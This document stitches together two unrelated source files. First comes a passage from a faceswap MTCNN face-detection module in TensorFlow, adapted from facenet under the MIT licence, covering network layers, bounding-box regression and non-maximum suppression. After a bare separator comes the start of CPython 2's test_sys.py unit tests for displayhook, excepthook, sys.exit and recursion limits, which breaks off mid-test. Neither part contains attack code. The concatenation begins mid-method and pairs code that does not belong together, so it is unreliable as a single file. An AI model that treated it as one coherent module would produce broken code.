sess = tf.Session(config=config)
with sess.as_default(): # pylint: disable=not-context-manager
pnet, rnet, onet = create_mtcnn(sess, self.model_path)
if any("gpu" in str(device).lower()
for device in sess.list_devices()):
logger.debug("Using GPU")
is_gpu = True
mtcnn_graph.finalize()
if not is_gpu:
alloc = 2048
logger.warning("Using CPU")
else:
alloc = vram_free
logger.debug("Allocated for Tensorflow: %sMB", alloc)
self.batch_size = int(alloc / self.vram)
if self.batch_size < 1:
self.error.set()
raise ValueError("Insufficient VRAM available to continue "
"({}MB)".format(int(alloc)))
logger.verbose("Processing in %s threads", self.batch_size)
self.kwargs["pnet"] = pnet
self.kwargs["rnet"] = rnet
self.kwargs["onet"] = onet
self.init.set()
logger.info("Initialized MTCNN Detector.")
except Exception as err:
self.error.set()
raise err
def detect_faces(self, *args, **kwargs):
""" Detect faces in Multiple Threads """
super().detect_faces(*args, **kwargs)
workers = MultiThread(target=self.detect_thread, thread_count=self.batch_size)
workers.start()
workers.join()
sentinel = self.queues["in"].get()
self.queues["out"].put(sentinel)
logger.debug("Detecting Faces complete")
def detect_thread(self):
""" Detect faces in rgb image """
logger.debug("Launching Detect")
while True:
item = self.get_item()
if item == "EOF":
break
logger.trace("Detecting faces: '%s'", item["filename"])
[detect_image, scale] = self.compile_detection_image(item["image"], to_rgb=True)
for angle in self.rotation:
current_image, rotmat = self.rotate_image(detect_image, angle)
faces, points = detect_face(current_image, **self.kwargs)
if angle != 0 and faces.any():
logger.verbose("found face(s) by rotating image %s degrees", angle)
if faces.any():
break
detected_faces = self.process_output(faces, points, rotmat, scale)
item["detected_faces"] = detected_faces
self.finalize(item)
logger.debug("Thread Completed Detect")
def process_output(self, faces, points, rotation_matrix, scale):
""" Compile found faces for output """
logger.trace("Processing Output: (faces: %s, points: %s, rotation_matrix: %s)",
faces, points, rotation_matrix)
faces = self.recalculate_bounding_box(faces, points)
faces = [BoundingBox(face[0], face[1], face[2], face[3]) for face in faces]
if isinstance(rotation_matrix, np.ndarray):
faces = [self.rotate_rect(face, rotation_matrix)
for face in faces]
detected = [BoundingBox(face.left / scale, face.top / scale,
face.right / scale, face.bottom / scale)
for face in faces]
logger.trace("Processed Output: %s", detected)
return detected
@staticmethod
def recalculate_bounding_box(faces, landmarks):
""" Recalculate the bounding box for Face Alignment.
Resize the bounding box around features to present
a better box to Face Alignment. Helps its chances
on edge cases and helps remove 'jitter' """
logger.trace("Recalculating Bounding Boxes: (faces: %s, landmarks: %s)",
faces, landmarks)
retval = list()
no_faces = len(faces)
if no_faces == 0:
return retval
face_landmarks = np.hsplit(landmarks, no_faces)
for idx in range(no_faces):
pts = np.reshape(face_landmarks[idx], (5, 2), order="F")
nose = pts[2]
minmax = (np.amin(pts, axis=0), np.amax(pts, axis=0))
padding = [(minmax[1][0] - minmax[0][0]) / 2,
(minmax[1][1] - minmax[0][1]) / 2]
center = (minmax[1][0] - padding[0], minmax[1][1] - padding[1])
offset = (center[0] - nose[0], nose[1] - center[1])
center = (center[0] + offset[0], center[1] + offset[1])
padding[0] += padding[0]
padding[1] += padding[1]
bounding = [center[0] - padding[0], center[1] - padding[1],
center[0] + padding[0], center[1] + padding[1]]
retval.append(bounding)
logger.trace("Recalculated Bounding Boxes: %s", retval)
return retval
# MTCNN Detector for face alignment
# Code adapted from: https://github.com/davidsandberg/facenet
# Tensorflow implementation of the face detection / alignment algorithm
# found at
# https://github.com/kpzhang93/MTCNN_face_detection_alignment
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def layer(operator):
"""Decorator for composable network layers."""
def layer_decorated(self, *args, **kwargs):
# Automatically set a name if not provided.
name = kwargs.setdefault('name', self.get_unique_name(operator.__name__))
# Figure out the layer inputs.
if len(self.terminals) == 0: # pylint: disable=len-as-condition
raise RuntimeError('No input variables found for layer %s.' % name)
elif len(self.terminals) == 1:
layer_input = self.terminals[0]
else:
layer_input = list(self.terminals)
# Perform the operation and get the output.
layer_output = operator(self, layer_input, *args, **kwargs)
# Add to layer LUT.
self.layers[name] = layer_output
# This output is now the input for the next layer.
self.feed(layer_output)
# Return self for chained calls.
return self
return layer_decorated
class Network():
""" Tensorflow Network """
def __init__(self, inputs, trainable=True):
# The input nodes for this network
self.inputs = inputs
# The current list of terminal nodes
self.terminals = []
# Mapping from layer names to layers
self.layers = dict(inputs)
# If true, the resulting variables are set as trainable
self.trainable = trainable
self.setup()
def setup(self):
"""Construct the network. """
raise NotImplementedError('Must be implemented by the subclass.')
@staticmethod
def load(model_path, session, ignore_missing=False):
"""Load network weights.
model_path: The path to the numpy-serialized network weights
session: The current TensorFlow session
ignore_missing: If true, serialized weights for missing layers are
ignored.
"""
# pylint: disable=no-member
data_dict = np.load(model_path, encoding='latin1').item()
for op_name in data_dict:
with tf.variable_scope(op_name, reuse=True):
for param_name, data in iteritems(data_dict[op_name]):
try:
var = tf.get_variable(param_name)
session.run(var.assign(data))
except ValueError:
if not ignore_missing:
raise
def feed(self, *args):
"""Set the input(s) for the next operation by replacing the terminal nodes.
The arguments can be either layer names or the actual layers.
"""
assert len(args) != 0 # pylint: disable=len-as-condition
self.terminals = []
for fed_layer in args:
if isinstance(fed_layer, string_types):
try:
fed_layer = self.layers[fed_layer]
except KeyError:
raise KeyError('Unknown layer name fed: %s' % fed_layer)
self.terminals.append(fed_layer)
return self
def get_output(self):
"""Returns the current network output."""
return self.terminals[-1]
def get_unique_name(self, prefix):
"""Returns an index-suffixed unique name for the given prefix.
This is used for auto-generating layer names based on the type-prefix.
"""
ident = sum(t.startswith(prefix) for t, _ in self.layers.items()) + 1
return '%s_%d' % (prefix, ident)
def make_var(self, name, shape):
"""Creates a new TensorFlow variable."""
return tf.get_variable(name, shape, trainable=self.trainable)
@staticmethod
def validate_padding(padding):
"""Verifies that the padding is one of the supported ones."""
assert padding in ('SAME', 'VALID')
@layer
def conv(self, # pylint: disable=too-many-arguments
inp,
k_h,
k_w,
c_o,
s_h,
s_w,
name,
relu=True,
padding='SAME',
group=1,
biased=True):
""" Conv Layer """
# pylint: disable=too-many-locals
# Verify that the padding is acceptable
self.validate_padding(padding)
# Get the number of channels in the input
c_i = int(inp.get_shape()[-1])
# Verify that the grouping parameter is valid
assert c_i % group == 0
assert c_o % group == 0
# Convolution for a given input and kernel
convolve = lambda i, k: tf.nn.conv2d(i, k, [1, s_h, s_w, 1], padding=padding) # noqa
with tf.variable_scope(name) as scope:
kernel = self.make_var('weights',
shape=[k_h, k_w, c_i // group, c_o])
# This is the common-case. Convolve the input without any
# further complications.
output = convolve(inp, kernel)
# Add the biases
if biased:
biases = self.make_var('biases', [c_o])
output = tf.nn.bias_add(output, biases)
if relu:
# ReLU non-linearity
output = tf.nn.relu(output, name=scope.name)
return output
@layer
def prelu(self, inp, name):
""" Prelu Layer """
with tf.variable_scope(name):
i = int(inp.get_shape()[-1])
alpha = self.make_var('alpha', shape=(i,))
output = tf.nn.relu(inp) + tf.multiply(alpha, -tf.nn.relu(-inp))
return output
@layer
def max_pool(self, inp, k_h, k_w, # pylint: disable=too-many-arguments
s_h, s_w, name, padding='SAME'):
""" Max Pool Layer """
self.validate_padding(padding)
return tf.nn.max_pool(inp,
ksize=[1, k_h, k_w, 1],
strides=[1, s_h, s_w, 1],
padding=padding,
name=name)
@layer
def fc(self, inp, num_out, name, relu=True): # pylint: disable=invalid-name
""" FC Layer """
with tf.variable_scope(name):
input_shape = inp.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = 1
for this_dim in input_shape[1:].as_list():
dim *= int(this_dim)
feed_in = tf.reshape(inp, [-1, dim])
else:
feed_in, dim = (inp, input_shape[-1].value)
weights = self.make_var('weights', shape=[dim, num_out])
biases = self.make_var('biases', [num_out])
operator = tf.nn.relu_layer if relu else tf.nn.xw_plus_b
fc = operator(feed_in, weights, biases, name=name) # pylint: disable=invalid-name
return fc
@layer
def softmax(self, target, axis, name=None): # pylint: disable=no-self-use
""" Multi dimensional softmax,
refer to https://github.com/tensorflow/tensorflow/issues/210
compute softmax along the dimension of target
the native softmax only supports batch_size x dimension """
max_axis = tf.reduce_max(target, axis, keepdims=True)
target_exp = tf.exp(target-max_axis)
normalize = tf.reduce_sum(target_exp, axis, keepdims=True)
softmax = tf.div(target_exp, normalize, name)
return softmax
class PNet(Network):
""" Tensorflow PNet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 10, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='PReLU1')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 16, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='PReLU2')
.conv(3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='PReLU3')
.conv(1, 1, 2, 1, 1, relu=False, name='conv4-1')
.softmax(3, name='prob1'))
(self.feed('PReLU3') # pylint: disable=no-value-for-parameter
.conv(1, 1, 4, 1, 1, relu=False, name='conv4-2'))
class RNet(Network):
""" Tensorflow RNet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 28, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='prelu1')
.max_pool(3, 3, 2, 2, name='pool1')
.conv(3, 3, 48, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='prelu2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(2, 2, 64, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='prelu3')
.fc(128, relu=False, name='conv4')
.prelu(name='prelu4')
.fc(2, relu=False, name='conv5-1')
.softmax(1, name='prob1'))
(self.feed('prelu4') # pylint: disable=no-value-for-parameter
.fc(4, relu=False, name='conv5-2'))
class ONet(Network):
""" Tensorflow ONet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='prelu1')
.max_pool(3, 3, 2, 2, name='pool1')
.conv(3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='prelu2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='prelu3')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(2, 2, 128, 1, 1, padding='VALID', relu=False, name='conv4')
.prelu(name='prelu4')
.fc(256, relu=False, name='conv5')
.prelu(name='prelu5')
.fc(2, relu=False, name='conv6-1')
.softmax(1, name='prob1'))
(self.feed('prelu5') # pylint: disable=no-value-for-parameter
.fc(4, relu=False, name='conv6-2'))
(self.feed('prelu5') # pylint: disable=no-value-for-parameter
.fc(10, relu=False, name='conv6-3'))
def create_mtcnn(sess, model_path):
""" Create the network """
if not model_path:
model_path, _ = os.path.split(os.path.realpath(__file__))
with tf.variable_scope('pnet'):
data = tf.placeholder(tf.float32, (None, None, None, 3), 'input')
pnet = PNet({'data': data})
pnet.load(model_path[0], sess)
with tf.variable_scope('rnet'):
data = tf.placeholder(tf.float32, (None, 24, 24, 3), 'input')
rnet = RNet({'data': data})
rnet.load(model_path[1], sess)
with tf.variable_scope('onet'):
data = tf.placeholder(tf.float32, (None, 48, 48, 3), 'input')
onet = ONet({'data': data})
onet.load(model_path[2], sess)
pnet_fun = lambda img: sess.run(('pnet/conv4-2/BiasAdd:0', # noqa
'pnet/prob1:0'),
feed_dict={'pnet/input:0': img})
rnet_fun = lambda img: sess.run(('rnet/conv5-2/conv5-2:0', # noqa
'rnet/prob1:0'),
feed_dict={'rnet/input:0': img})
onet_fun = lambda img: sess.run(('onet/conv6-2/conv6-2:0', # noqa
'onet/conv6-3/conv6-3:0',
'onet/prob1:0'),
feed_dict={'onet/input:0': img})
return pnet_fun, rnet_fun, onet_fun
def detect_face(img, minsize, pnet, rnet, # pylint: disable=too-many-arguments
onet, threshold, factor):
"""Detects faces in an image, and returns bounding boxes and points for them.
img: input image
minsize: minimum faces' size
pnet, rnet, onet: caffemodel
threshold: threshold=[th1, th2, th3], th1-3 are three steps's threshold
factor: the factor used to create a scaling pyramid of face sizes to
detect in the image.
"""
# pylint: disable=too-many-locals,too-many-statements,too-many-branches
factor_count = 0
total_boxes = np.empty((0, 9))
points = np.empty(0)
height = img.shape[0]
width = img.shape[1]
minl = np.amin([height, width])
var_m = 12.0 / minsize
minl = minl * var_m
# create scale pyramid
scales = []
while minl >= 12:
scales += [var_m * np.power(factor, factor_count)]
minl = minl * factor
factor_count += 1
# # # # # # # # # # # # #
# first stage - fast proposal network (pnet) to obtain face candidates
# # # # # # # # # # # # #
for scale in scales:
height_scale = int(np.ceil(height * scale))
width_scale = int(np.ceil(width * scale))
im_data = imresample(img, (height_scale, width_scale))
im_data = (im_data - 127.5) * 0.0078125
img_x = np.expand_dims(im_data, 0)
img_y = np.transpose(img_x, (0, 2, 1, 3))
out = pnet(img_y)
out0 = np.transpose(out[0], (0, 2, 1, 3))
out1 = np.transpose(out[1], (0, 2, 1, 3))
boxes, _ = generate_bounding_box(out1[0, :, :, 1].copy(),
out0[0, :, :, :].copy(),
scale, threshold[0])
# inter-scale nms
pick = nms(boxes.copy(), 0.5, 'Union')
if boxes.size > 0 and pick.size > 0:
boxes = boxes[pick, :]
total_boxes = np.append(total_boxes, boxes, axis=0)
numbox = total_boxes.shape[0]
if numbox > 0:
pick = nms(total_boxes.copy(), 0.7, 'Union')
total_boxes = total_boxes[pick, :]
regw = total_boxes[:, 2]-total_boxes[:, 0]
regh = total_boxes[:, 3]-total_boxes[:, 1]
qq_1 = total_boxes[:, 0]+total_boxes[:, 5] * regw
qq_2 = total_boxes[:, 1]+total_boxes[:, 6] * regh
qq_3 = total_boxes[:, 2]+total_boxes[:, 7] * regw
qq_4 = total_boxes[:, 3]+total_boxes[:, 8] * regh
total_boxes = np.transpose(np.vstack([qq_1, qq_2, qq_3, qq_4, total_boxes[:, 4]]))
total_boxes = rerec(total_boxes.copy())
total_boxes[:, 0:4] = np.fix(total_boxes[:, 0:4]).astype(np.int32)
d_y, ed_y, d_x, ed_x, var_y, e_y, var_x, e_x, tmpw, tmph = pad(total_boxes.copy(),
width, height)
numbox = total_boxes.shape[0]
# # # # # # # # # # # # #
# second stage - refinement of face candidates with rnet
# # # # # # # # # # # # #
if numbox > 0:
tempimg = np.zeros((24, 24, 3, numbox))
for k in range(0, numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
tmp[d_y[k] - 1:ed_y[k], d_x[k] - 1:ed_x[k], :] = img[var_y[k] - 1:e_y[k],
var_x[k]-1:e_x[k], :]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = imresample(tmp, (24, 24))
else:
return np.empty()
tempimg = (tempimg-127.5)*0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = rnet(tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
score = out1[1, :]
ipass = np.where(score > threshold[1])
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(),
np.expand_dims(score[ipass].copy(), 1)])
m_v = out0[:, ipass[0]]
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
total_boxes = bbreg(total_boxes.copy(), np.transpose(m_v[:, pick]))
total_boxes = rerec(total_boxes.copy())
numbox = total_boxes.shape[0]
# # # # # # # # # # # # #
# third stage - further refinement and facial landmarks positions with onet
# NB: Facial landmarks code commented out for faceswap
# # # # # # # # # # # # #
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes).astype(np.int32)
d_y, ed_y, d_x, ed_x, var_y, e_y, var_x, e_x, tmpw, tmph = pad(total_boxes.copy(),
width, height)
tempimg = np.zeros((48, 48, 3, numbox))
for k in range(0, numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
tmp[d_y[k] - 1:ed_y[k], d_x[k] - 1:ed_x[k], :] = img[var_y[k] - 1:e_y[k],
var_x[k] - 1:e_x[k], :]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = imresample(tmp, (48, 48))
else:
return np.empty()
tempimg = (tempimg-127.5)*0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = onet(tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
out2 = np.transpose(out[2])
score = out2[1, :]
points = out1
ipass = np.where(score > threshold[2])
points = points[:, ipass[0]]
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(),
np.expand_dims(score[ipass].copy(), 1)])
m_v = out0[:, ipass[0]]
width = total_boxes[:, 2] - total_boxes[:, 0] + 1
height = total_boxes[:, 3] - total_boxes[:, 1] + 1
points[0:5, :] = (np.tile(width, (5, 1)) * points[0:5, :] +
np.tile(total_boxes[:, 0], (5, 1)) - 1)
points[5:10, :] = (np.tile(height, (5, 1)) * points[5:10, :] +
np.tile(total_boxes[:, 1], (5, 1)) - 1)
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes.copy(), np.transpose(m_v))
pick = nms(total_boxes.copy(), 0.7, 'Min')
total_boxes = total_boxes[pick, :]
points = points[:, pick]
return total_boxes, points
# function [boundingbox] = bbreg(boundingbox,reg)
def bbreg(boundingbox, reg):
"""Calibrate bounding boxes"""
if reg.shape[1] == 1:
reg = np.reshape(reg, (reg.shape[2], reg.shape[3]))
width = boundingbox[:, 2] - boundingbox[:, 0] + 1
height = boundingbox[:, 3] - boundingbox[:, 1] + 1
b_1 = boundingbox[:, 0] + reg[:, 0] * width
b_2 = boundingbox[:, 1] + reg[:, 1] * height
b_3 = boundingbox[:, 2] + reg[:, 2] * width
b_4 = boundingbox[:, 3] + reg[:, 3] * height
boundingbox[:, 0:4] = np.transpose(np.vstack([b_1, b_2, b_3, b_4]))
return boundingbox
def generate_bounding_box(imap, reg, scale, threshold):
"""Use heatmap to generate bounding boxes"""
# pylint: disable=too-many-locals
stride = 2
cellsize = 12
imap = np.transpose(imap)
d_x1 = np.transpose(reg[:, :, 0])
d_y1 = np.transpose(reg[:, :, 1])
d_x2 = np.transpose(reg[:, :, 2])
d_y2 = np.transpose(reg[:, :, 3])
dim_y, dim_x = np.where(imap >= threshold)
if dim_y.shape[0] == 1:
d_x1 = np.flipud(d_x1)
d_y1 = np.flipud(d_y1)
d_x2 = np.flipud(d_x2)
d_y2 = np.flipud(d_y2)
score = imap[(dim_y, dim_x)]
reg = np.transpose(np.vstack([d_x1[(dim_y, dim_x)], d_y1[(dim_y, dim_x)],
d_x2[(dim_y, dim_x)], d_y2[(dim_y, dim_x)]]))
if reg.size == 0:
reg = np.empty((0, 3))
bbox = np.transpose(np.vstack([dim_y, dim_x]))
q_1 = np.fix((stride * bbox + 1) / scale)
q_2 = np.fix((stride * bbox + cellsize - 1 + 1) / scale)
boundingbox = np.hstack([q_1, q_2, np.expand_dims(score, 1), reg])
return boundingbox, reg
# function pick = nms(boxes,threshold,type)
def nms(boxes, threshold, method):
""" Non_Max Suppression """
# pylint: disable=too-many-locals
if boxes.size == 0:
return np.empty((0, 3))
x_1 = boxes[:, 0]
y_1 = boxes[:, 1]
x_2 = boxes[:, 2]
y_2 = boxes[:, 3]
var_s = boxes[:, 4]
area = (x_2 - x_1 + 1) * (y_2 - y_1 + 1)
s_sort = np.argsort(var_s)
pick = np.zeros_like(var_s, dtype=np.int16)
counter = 0
while s_sort.size > 0:
i = s_sort[-1]
pick[counter] = i
counter += 1
idx = s_sort[0:-1]
xx_1 = np.maximum(x_1[i], x_1[idx])
yy_1 = np.maximum(y_1[i], y_1[idx])
xx_2 = np.minimum(x_2[i], x_2[idx])
yy_2 = np.minimum(y_2[i], y_2[idx])
width = np.maximum(0.0, xx_2-xx_1+1)
height = np.maximum(0.0, yy_2-yy_1+1)
inter = width * height
if method == 'Min':
var_o = inter / np.minimum(area[i], area[idx])
else:
var_o = inter / (area[i] + area[idx] - inter)
s_sort = s_sort[np.where(var_o <= threshold)]
pick = pick[0:counter]
return pick
# function [d_y ed_y d_x ed_x y e_y x e_x tmp_width tmp_height] = pad(total_boxes,width,height)
def pad(total_boxes, width, height):
"""Compute the padding coordinates (pad the bounding boxes to square)"""
tmp_width = (total_boxes[:, 2] - total_boxes[:, 0] + 1).astype(np.int32)
tmp_height = (total_boxes[:, 3] - total_boxes[:, 1] + 1).astype(np.int32)
numbox = total_boxes.shape[0]
d_x = np.ones((numbox), dtype=np.int32)
d_y = np.ones((numbox), dtype=np.int32)
ed_x = tmp_width.copy().astype(np.int32)
ed_y = tmp_height.copy().astype(np.int32)
dim_x = total_boxes[:, 0].copy().astype(np.int32)
dim_y = total_boxes[:, 1].copy().astype(np.int32)
e_x = total_boxes[:, 2].copy().astype(np.int32)
e_y = total_boxes[:, 3].copy().astype(np.int32)
tmp = np.where(e_x > width)
ed_x.flat[tmp] = np.expand_dims(-e_x[tmp] + width + tmp_width[tmp], 1)
e_x[tmp] = width
tmp = np.where(e_y > height)
ed_y.flat[tmp] = np.expand_dims(-e_y[tmp] + height + tmp_height[tmp], 1)
e_y[tmp] = height
tmp = np.where(dim_x < 1)
d_x.flat[tmp] = np.expand_dims(2 - dim_x[tmp], 1)
dim_x[tmp] = 1
tmp = np.where(dim_y < 1)
d_y.flat[tmp] = np.expand_dims(2 - dim_y[tmp], 1)
dim_y[tmp] = 1
return d_y, ed_y, d_x, ed_x, dim_y, e_y, dim_x, e_x, tmp_width, tmp_height
# function [bbox_a] = rerec(bbox_a)
def rerec(bbox_a):
"""Convert bbox_a to square."""
height = bbox_a[:, 3]-bbox_a[:, 1]
width = bbox_a[:, 2]-bbox_a[:, 0]
length = np.maximum(width, height)
bbox_a[:, 0] = bbox_a[:, 0] + width * 0.5 - length * 0.5
bbox_a[:, 1] = bbox_a[:, 1] + height * 0.5 - length * 0.5
bbox_a[:, 2:4] = bbox_a[:, 0:2] + np.transpose(np.tile(length, (2, 1)))
return bbox_a
def imresample(img, size):
""" Resample image """
# pylint: disable=no-member
im_data = cv2.resize(img, (size[1], size[0]),
interpolation=cv2.INTER_AREA) # @UndefinedVariable
return im_data
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import cStringIO
import gc
import operator
import os
import struct
import sys
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# test that the exit machinery handles long exit codes
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47L)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
rc, out, err = assert_python_ok('-c', 'raise SystemExit(0L)')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
